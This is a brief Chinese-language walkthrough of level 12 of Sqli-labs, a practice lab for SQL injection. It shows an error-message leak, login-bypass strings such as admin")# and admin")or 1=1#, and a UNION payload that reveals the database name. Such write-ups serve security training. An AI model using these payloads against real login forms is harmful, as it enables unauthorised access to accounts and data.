Sqli-labs Less-12 Union注入

本关和less11是类似的，只是在id 的参数的处理上有一定的不同

当输入username：admin"

Password：(随便)

报错后的结果为：

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ddd") LIMIT 0,1' at line 1

关注到上述的红色部分，也就是 ") 的部分，我们可以得知这里的id进行了 ("id")的处理，所以我们依旧可以用万能密码进行尝试。

Username： admin")#

Password: (随便输)

从上图中可以看到我们以admin登录成功了。

这里注意用 admin")or 1=1# 方式登录的话，居然是Dumb登录，这里解释一下为什么不是admin登录。其实是因为sql执行的优先级的问题。

接下来我们就可以使用Union注入了，过程类似于less11，只是将'换成了")，举例如下：

爆数据库

Username：xxx") union select 1,database() #

Password：1（任意密码）

可以看到显示了database为security。

其他的与less11类似，不再赘述。

 

参考：https://www.cnblogs.com/lcamry/p/5763074.html